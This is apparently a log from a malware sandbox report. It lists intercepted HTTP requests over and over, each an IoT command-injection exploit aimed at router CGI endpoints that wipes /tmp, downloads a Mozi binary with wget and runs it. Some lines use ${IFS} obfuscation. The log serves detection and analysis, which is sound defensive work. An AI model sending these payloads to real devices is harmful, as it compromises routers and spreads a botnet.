                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 18.90.81.31:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 156.188.135.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 134.249.173.68:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 113.108.229.93:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 183.204.170.57:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 49.66.23.144:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 76.225.145.132:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 173.143.115.27:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.230.138.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 66.158.237.47:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 209.97.96.87:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 196.101.145.19:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 71.6.68.16:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 166.67.117.189:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 62.197.147.85:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 5.112.156.32:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 196.77.36.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 75.42.18.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
